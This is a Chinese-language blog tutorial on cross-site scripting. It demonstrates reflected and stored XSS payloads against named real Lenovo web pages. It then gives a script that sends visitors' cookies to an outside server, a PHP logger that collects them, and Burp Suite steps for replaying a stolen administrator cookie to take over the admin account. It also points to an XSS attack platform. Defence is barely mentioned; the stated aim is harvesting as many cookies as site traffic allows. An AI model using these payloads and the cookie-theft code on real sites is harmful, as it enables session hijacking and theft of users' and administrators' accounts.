xss脚本攻击

xss脚本攻击不仅仅只是alert(1)就算完了，xss脚本攻击真正的用处是盗取普通用户的cookie，或者盗取管理员的cookie。

xss分类（类型）：

1、 反射型xss
2、 存储型xss
3、 DOM型xss

xss分类（代码）：

1、js代码中xss
2、事件中的xss
3、html中的xss
4、外部引入xss

说到外部引入，讲一下同源策略与跨域请求

同源策略：

由Netscape提出的一个著名的安全策略，现在所有支持JavaScript 的浏览器都会使用这个策略，所谓同源是指：协议，域名，端口相同。

为什么需要同源策略？

假设现在没有同源策略，会发生什么事情呢？大家知道，JavaScript可以做很多东西，比如：读取/修改网页中某个值。嗯，你现在打开了浏览器，在一个tab窗口中打开了银行网站，在另外一个tab窗口中打开了一个恶意网站，而那个恶意网站挂了一个的专门修改银行信息的JavaScript，当你访问这个恶意网站并且执行它JavaScript时，你的银行页面就会被这个JavaScript修改，后果会非常严重！而同源策略就为了防止这种事情发生。

比如说，浏览器的两个tab页中分别打开了http://www.baidu.com/index.html和http: //www.google.com/index.html，其中，JavaScript1和JavaScript3是属于百度的脚本，而 JavaScript2是属于谷歌的脚本，当浏览器的tab1要运行一个脚本时，便会进行同源检查，只有和www.baidu.com同源的脚本才能被执行。所以，tab1只能执行JavaScript1和JavaScript3脚本，而JavaScript2不能 执行，从而防止其他网页对本网页的非法篡改。

这下，应该明白同源策略是什么意思了吧。

跨域请求，可以使用<script>标签的src属性，这样，就可以引入外部的js代码，达到绕过同源策略限制的目的。

现在的浏览器，基本上都有同源策略，xss攻击防范，大家可以研究下。

xss攻击平台：

http://xsser.me

可以通过该平台盗取cookie，也可以通过自己控制的服务器盗取cookie。

例1，本地xss

直接在浏览器输入：javascript:alert(document.cookie)，即可将当前页面的cookie弹出来，如果要将当前页面中某个变量的值弹出来，直接alert (变量)即可。

例2，联想weixin站反射型xss

开启Firefox，输入：

http://weixin.lenovo.com/weixin/index.php/faq/faqdetail?faq_title_id=11111111

查看源码，可以看到，输入的数据已然被输出到<script>标签范围了，此时，我们就不用担心，构造<script>标签的事情了，我们就可以直接测试单引号，双引号，分号，alert，prompt，等等这些关键字是否被过滤或者编码！

输入：

http://weixin.lenovo.com/weixin/index.php/faq/faqdetail?faq_title_id=1'2"3(4;5alert6prompt

执行，查看源码：

var title_id = '1'2"3(4;5alert6prompt';

可见，双引号被编码成："，但是，单引号可以用，而且，这里分号与//注释符也可以使用，关键字alert也没有过滤。

于是，构造输入：

http://weixin.lenovo.com/weixin/index.php/faq/faqdetail?faq_title_id=111';alert(1)//

果断弹窗！

此时，查看该页面源码，xss Playload如下：

var title_id = '111';alert(1)//';

等价于：

var title_id = '111';

alert(1)

如图所示：

其实，xss漏洞挖掘，本质上还是在知晓xss漏洞原理的情况下，熟读js代码。除此之外，没有其他的捷径了！当然，xss漏洞挖掘技巧还是非常重要的！

例3，联想ask站存储型xss

开启Firefox，输入：http://ask.lenovo.com.cn/html/index.html

注册，登录，发帖：

贴子详情：

添加问题：<svg/onload=alert(1)> //这里即是xss的输入关键点

详细描述：123 //这里随便填写就好了

如图所示：

发帖：

直接就弹窗了：

此时

如果，将<svg/onload=alert(1)>改成<svg/onload=alert(document.cookie)>，就会弹出当前访问用户的cookie

更进一步

如果，将<svg/onload=alert(document.cookie)>改成如下代码：

<script>

document.location = 'http://baidu.com/cookie.php?cookie=' + document.cookie;

</script>

而此时，baidu.com服务器web根目录下的cookie.php源代码如下：

<?php

$cookie = $_GET['cookie'];

$log = fopen("cookie.txt", "a");

fwrite($log, $cookie ."\n");

fclose($log);

?>

大家可以看到，通过这两段代码，我们就可以搜集所有访问该xss页面用户的cookie了。

并且，将搜集到的所有cookie都保存到baidu.com服务器web根目录下的cookie.txt文件中。

如果，ask站的流量大，那么，cookie.txt文件中cookie就多，换句话说，站点流量的大小直接决定我们搜集cookie的多少！

当然，这只是php代码搜集cookie的案例，其他语言代码也可以搜集cookie，可以根据具体server环境，选择不同的搜集cookie的代码。

搜集到了cookie后，我们拿他来干嘛？

当然是欺骗普通用户，或者是管理员了！

如果是普通用户的cookie，我们就可以欺骗普通用户

如果是管理员的cookie，我们就可以欺骗管理员了

例如，联想ask站

欺骗的具体流程，如下：

1、 注册一个普通用户，如：xsser
2、 成功登录该普通用户一次，服务器就会在该普通用户的本地生成该用户对应的cookie
3、 再次登录该普通用户，使用burpsuite抓取登录请求数据包
4、 可以看到：http头中xsser用户对应的cookie字段及cookie值
5、 这个值，就是xsser用户在ask站对应的cookie值
6、 使用ask站admin用户的cookie值替换该处xsser用户的cookie值
7、 替换完成后，使用burpsuite提交登录请求数据包
8、 admin用户登录成功！

到此，我们就算欺骗admin用户，成功登录了！

如果，admin用户是普通用户，那么，就并没有什么太大的用处，xsser就是普通用户！

如果，admin用户是管理员用户，那么，此时，我们就是ask站的管理员了！

例4， dom  xss

简单来说，dom xss就是html页面本身的js代码所触发的xss，可以绕过浏览器和waf的防护。

大家有空可以自行研究下。